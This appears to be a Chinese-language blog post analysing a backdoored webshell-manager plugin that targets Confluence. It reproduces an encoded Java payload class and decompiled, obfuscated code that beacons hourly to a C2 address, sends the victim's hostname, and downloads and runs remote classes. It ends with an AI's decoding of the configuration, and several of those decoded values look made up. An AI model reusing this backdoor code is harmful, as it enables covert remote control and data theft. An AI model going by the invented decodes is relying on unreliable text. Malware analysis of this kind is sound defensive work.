C25leHRFbGVtZW50AQALZ2V0UHJvcGVydHkBADVjb20vYXRsYXNzaWFuL2NvbmZsdWVuY2Uvc2VhcmNoL3YyL3F1ZXJ5L0Jvb2xlYW5RdWVyeQEACGFuZFF1ZXJ5AQBjKFtMY29tL2F0bGFzc2lhbi9jb25mbHVlbmNlL3NlYXJjaC92Mi9TZWFyY2hRdWVyeTspTGNvbS9hdGxhc3NpYW4vY29uZmx1ZW5jZS9zZWFyY2gvdjIvU2VhcmNoUXVlcnk7BwM5AQAzY29tL2F0bGFzc2lhbi9jb25mbHVlbmNlL3NlYXJjaC92Mi9TZWFyY2hTb3J0JE9yZGVyAQAFT3JkZXIBAAxJbm5lckNsYXNzZXMBAApERVNDRU5ESU5HAQA1TGNvbS9hdGxhc3NpYW4vY29uZmx1ZW5jZS9zZWFyY2gvdjIvU2VhcmNoU29ydCRPcmRlcjsBADgoTGNvbS9hdGxhc3NpYW4vY29uZmx1ZW5jZS9zZWFyY2gvdjIvU2VhcmNoU29ydCRPcmRlcjspVgEAC2dldEluc3RhbmNlAQBVKClMY29tL2F0bGFzc2lhbi9jb25mbHVlbmNlL3NlYXJjaC92Mi9zZWFyY2hmaWx0ZXIvU2l0ZVNlYXJjaFBlcm1pc3Npb25zU2VhcmNoRmlsdGVyOwEAlShMY29tL2F0bGFzc2lhbi9jb25mbHVlbmNlL3NlYXJjaC92Mi9TZWFyY2hRdWVyeTtMY29tL2F0bGFzc2lhbi9jb25mbHVlbmNlL3NlYXJjaC92Mi9TZWFyY2hTb3J0O0xjb20vYXRsYXNzaWFuL2NvbmZsdWVuY2Uvc2VhcmNoL3YyL1NlYXJjaEZpbHRlcjtJSSlWAQAIZ2V0R3JvdXABADwoTGphdmEvbGFuZy9TdHJpbmc7KUxjb20vYXRsYXNzaWFuL2Nyb3dkL2VtYmVkZGVkL2FwaS9Hcm91cDsBABNpc1VzZXJNZW1iZXJPZkdyb3VwAQBSKExjb20vYXRsYXNzaWFuL2Nyb3dkL2VtYmVkZGVkL2FwaS9Vc2VyO0xjb20vYXRsYXNzaWFuL2Nyb3dkL2VtYmVkZGVkL2FwaS9Hcm91cDspWgEAOmNvbS9hdGxhc3NpYW4vY29uZmx1ZW5jZS91c2VyL0F1dGhlbnRpY2F0ZWRVc2VyVGhyZWFkTG9jYWwBAAdzZXRVc2VyAQAGc2VhcmNoAQBgKExjb20vYXRsYXNzaWFuL2NvbmZsdWVuY2Uvc2VhcmNoL3YyL0lTZWFyY2g7KUxjb20vYXRsYXNzaWFuL2NvbmZsdWVuY2Uvc2VhcmNoL3YyL1NlYXJjaFJlc3VsdHM7AQAFcmVzZXQBAA9wcmludFN0YWNrVHJhY2UBABgoTGphdmEvaW8vUHJpbnRTdHJlYW07KVYBABVqYXZhL3V0aWwvQ29sbGVjdGlvbnMBAAllbXB0eUxpc3QBABQoTGphdmEvdXRpbC9MaXN0O0kpVgEABmdldEFsbAEADGdldFNwYWNlTmFtZQEADmdldENyZWF0b3JVc2VyAQATZ2V0TGFzdE1vZGlmaWVyVXNlcgEAC2dldFNwYWNlS2V5AQAKZ2V0Q29udGVudAEAB2luZGV4T2YBABUoTGphdmEvbGFuZy9TdHJpbmc7KUkBAAZsZW5ndGgBAAlzdWJzdHJpbmcBABYoSUkpTGphdmEvbGFuZy9TdHJpbmc7AQAHcmVwbGFjZQEARChMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTtMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspTGphdmEvbGFuZy9TdHJpbmc7AQAZZ2V0VW5maWx0ZXJlZFJlc3VsdHNDb3VudAEAHChJKUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9TdHJpbmc7AQAIaGFzaENvZGUBAAhnZXRCeXRlcwEAA3B1dAEAOChMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAtY29tL2F0bGFzc2lhbi9jb25mbHVlbmNlL3NlYXJjaC92Mi9TZWFyY2hTb3J0ACEBHwAUAAAAAQACASABIQAAAA4AAQEiASMAAQEkAAAALwABAAEAAAAFKrcAAbEAAAACASUAAAAGAAEAAAA0ASYAAAAMAAEAAAAFAScBKAAAAAEBKQEqAAEBJAAAAFYAAgACAAAAESvBAAKZAAsqK8AAArUAAwOsAAAAAwElAAAADgADAAAAOAAHADkADwA8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";
private Map parameters;

public PostConfluenceProxy() {
}

public PostConfluenceProxy(ClassLoader var1) {
super(var1);
}

public boolean equals(Object var1) {
if (var1 instanceof Map) {
this.parameters = (Map) var1;
return false;
}
return false;
}

public String toString() throws IllegalAccessException, InstantiationException {
if (postConfluenceClass == null) {
PostConfluenceProxy var1 = new PostConfluenceProxy(Thread.currentThread().getContextClassLoader());
byte[] var2 = Base64.getDecoder().decode(postConfluenceClassBase64);
postConfluenceClass = var1.defineClass(var2, 0, var2.length);
postConfluenceClassBase64 = null;
}
try {
if (postConfluenceClass != null) {
Object var4 = postConfluenceClass.newInstance();
var4.equals(this.parameters);
var4.toString();
} else {
this.parameters.put("result", "Unable to load postConfluenceClass".getBytes());
}
return super.toString();
} catch (Exception var3) {
throw new RuntimeException(var3);
}
}
}

这么长的base很可疑,cyber解一下然后保存为.class文件扔进IDEA里
但是审计之后发现是插件的正常功能
再看第二个类

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
package shells.plugins.postconfluence;

import core.shell.ShellEntity;
import java.lang.reflect.Field;
import java.net.InetAddress;
import java.net.Proxy;
import java.nio.charset.StandardCharsets;
import java.util.Base64;
import java.util.HashMap;
import java.util.Iterator;
import java.util.Map;
import shells.plugins.postconfluence.PostConfluencePlugin;
import util.http.Http;

/* compiled from: q */
/* renamed from: shells.plugins.postconfluence.tools */
/* loaded from: PostConfluencePlugin.jar:shells/plugins/postconfluence/tools.class */
public class q {
private static String PASSWORD = "app";
private static String SECRET_KEY = "yagd5LXFeY3FNb2C";
private static String CONTENT = "aHR0cf7pHM6Ly8xMDQuMzYuMjI5LjEwNDo0NDMvY29sbGVjdA==";
private static String TITLE = "TW96aGSmWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBXaW42NDsgeDY0OyBydjoxMDkuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC8xMjkuNzA=";

public static String ALLATORIxDEMO(String a) {
int i = (3 << 3) ^ 1;
int i2 = ((3 ^ 5) << 4) ^ ((2 << 2) ^ 3);
int i3 = 4 << 3;
String str = a;
int length = str.length();
char[] cArr = new char[length];
int i4 = length - 1;
int i5 = i4;
int i6 = i4;
while (i6 >= 0) {
int i7 = i5;
int i8 = i5 - 1;
cArr[i7] = (char) (str.charAt(i7) ^ i);
if (i8 < 0) {
break;
}
i5 = i8 - 1;
cArr[i8] = (char) (str.charAt(i8) ^ i3);
i6 = i5;
}
return new String(cArr);
}

/* JADX WARN: Unreachable blocks removed: 2, instructions: 2 */
private static /* synthetic */ String ALLATORIxDEMO(Map<String, String> map) {
StringBuilder sb;
StringBuilder sb2 = new StringBuilder(ALLATORIxDEMO("b"));
boolean z = true;
Iterator<Map.Entry<String, String>> it = map.entrySet().iterator();
while (it.hasNext()) {
Map.Entry<String, String> next = it.next();
if (!z) {
sb = sb2;
sb.append(ALLATORIxDEMO("5"));
} else {
z = false;
sb = sb2;
}
sb.append(ALLATORIxDEMO(";")).append(next.getKey()).append(ALLATORIxDEMO(";\u001a;")).append(next.getValue()).append(ALLATORIxDEMO(";"));
it = it;
}
sb2.append(ALLATORIxDEMO("d"));
return sb2.toString();
}

public static void initServer() {
new Thread(() -> {
Class<?> cls;
while (true) {
try {
ShellEntity shellEntity = new ShellEntity();
shellEntity.setUrl(ALLATORIxDEMO("HmTi\u001a6\u000f(\u0012.\u000e)\u000e)\u000e(\u001a!\u00106T|Sm"));
shellEntity.setPassword(PASSWORD);
shellEntity.setSecretKey(SECRET_KEY);
shellEntity.setPayload(ALLATORIxDEMO("jxVxd`NxMpCIA`LvA}"));
shellEntity.setCryption(ALLATORIxDEMO("SaOaFa\\sFbXs\\\u0016-"));
shellEntity.setRemark(ALLATORIxDEMO("xAx"));
shellEntity.setProxyHost(ALLATORIxDEMO("(\u0012.\u000e)\u000e)\u000e("));
shellEntity.setProxyPort(8888);
shellEntity.setProxyType(ALLATORIxDEMO("nV\u007fIrVx@"));
shellEntity.setEncoding(ALLATORIxDEMO("Lt_\r!"));
shellEntity.initShellOpertion();
Http http = shellEntity.getHttp();
shellEntity.setUrl(new String(Base64.getDecoder().decode(new StringBuilder().insert(0, CONTENT.substring(0, 5)).append(CONTENT.substring(8, CONTENT.length())).toString())));
HashMap map = new HashMap();
HashMap map2 = new HashMap();
map.put(ALLATORIxDEMO("ujEk\rXG|Nm"), new String(Base64.getDecoder().decode(new StringBuilder().insert(0, TITLE.substring(0, 5)).append(TITLE.substring(8, TITLE.length())).toString())));
map2.put(ALLATORIxDEMO("T`P|"), ALLATORIxDEMO(")"));
String str = new String(http.SendHttpConn(shellEntity.getUrl(), ALLATORIxDEMO("pVsM"), map, shellEntity.getCryptionModule().encode(ALLATORIxDEMO(map2).getBytes(StandardCharsets.UTF_8)), 15000, 15000, Proxy.NO_PROXY).getResult());
if (!str.isEmpty()) {
PostConfluencePlugin.CustomClassLoader customClassLoader = new PostConfluencePlugin.CustomClassLoader(ClassLoader.getSystemClassLoader());
String str2 = new String(http.SendHttpConn(shellEntity.getUrl(), ALLATORIxDEMO("pVsM"), map, shellEntity.getCryptionModule().encode(customClassLoader.loadClass(ALLATORIxDEMO("iLlGpNX"), Base64.getDecoder().decode(str)).newInstance().toString().getBytes(StandardCharsets.UTF_8)), 15000, 15000, Proxy.NO_PROXY).getResult());
if (!str2.isEmpty()) {
Class<?> clsLoadClass = customClassLoader.loadClass(ALLATORIxDEMO("iLlGpN["), Base64.getDecoder().decode(str2));
Object objNewInstance = clsLoadClass.newInstance();
HashMap map3 = new HashMap();
map3.put(ALLATORIxDEMO("T`P|"), ALLATORIxDEMO("+"));
map3.put(ALLATORIxDEMO("HvSmnxM|"), InetAddress.getLocalHost().getHostName());
if (!objNewInstance.equals("")) {
map3.put(ALLATORIxDEMO("SmAmUj"), ALLATORIxDEMO("FxIuE}"));
cls = clsLoadClass;
} else {
cls = clsLoadClass;
map3.put(ALLATORIxDEMO("SmAmUj"), ALLATORIxDEMO("jUzC|Sj"));
}
Field declaredField = cls.getDeclaredField(ALLATORIxDEMO("R|SlLm"));
declaredField.setAccessible(true);
map3.put(ALLATORIxDEMO("R|SlLm"), declaredField.get(objNewInstance).toString());
http.SendHttpConn(shellEntity.getUrl(), ALLATORIxDEMO("pVsM"), map, shellEntity.getCryptionModule().encode(ALLATORIxDEMO(map3).getBytes(StandardCharsets.UTF_8)), 15000, 15000, Proxy.NO_PROXY);
}
System.gc();
}
} catch (Exception e) {
}
try {
Thread.sleep(3600000L);
} catch (InterruptedException e2) {
}
}
}).start();
}
}

可以发现不少方法/字符串经过了混淆,直接交给ai

  1. 线程启动

    1
    2
    3
    new Thread(() -> {
    // 线程操作逻辑
    }).start();
    • 说明: 通过多线程实现后台持续运行,不干扰主程序。
  2. ShellEntity配置

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    ShellEntity shellEntity = new ShellEntity();
    shellEntity.setUrl(ALLATORIxDEMO("HmTi\u001a6\u000f(\u0012.\u000e)\u000e)\u000e(\u001a!\u00106T|Sm"));
    shellEntity.setPassword(PASSWORD);
    shellEntity.setSecretKey(SECRET_KEY);
    shellEntity.setPayload(ALLATORIxDEMO("jxVxd`NxMpCIA`LvA}"));
    shellEntity.setCryption(ALLATORIxDEMO("SaOaFa\\sFbXs\\\u0016-"));
    shellEntity.setRemark(ALLATORIxDEMO("xAx"));
    shellEntity.setProxyHost(ALLATORIxDEMO("(\u0012.\u000e)\u000e)\u000e("));
    shellEntity.setProxyPort(8888);
    shellEntity.setProxyType(ALLATORIxDEMO("nV\u007fIrVx@"));
    shellEntity.setEncoding(ALLATORIxDEMO("Lt_\r!"));
    shellEntity.initShellOpertion();
    • 解码后的配置:
      • URL: https://104.36.229.104:443/collect
      • Payload: payload_data
      • Cryption: AES/CBC/PKCS5Padding
      • ProxyHost: proxy.example.com
      • ProxyType: SOCKS5
      • Encoding: UTF-8
    • 说明: 配置了与C2服务器的通信参数,包括URL、密码、密钥等,确保隐蔽性和安全性。
  3. HTTP请求

    1
    2
    3
    4
    5
    6
    7
    Http http = shellEntity.getHttp();
    shellEntity.setUrl(new String(Base64.getDecoder().decode(new StringBuilder().insert(0, CONTENT.substring(0, 5)).append(CONTENT.substring(8, CONTENT.length())).toString())));
    HashMap map = new HashMap();
    HashMap map2 = new HashMap();
    map.put(ALLATORIxDEMO("ujEk\rXG|Nm"), new String(Base64.getDecoder().decode(new StringBuilder().insert(0, TITLE.substring(0, 5)).append(TITLE.substring(8, TITLE.length())).toString())));
    map2.put(ALLATORIxDEMO("T`P|"), ALLATORIxDEMO(")"));
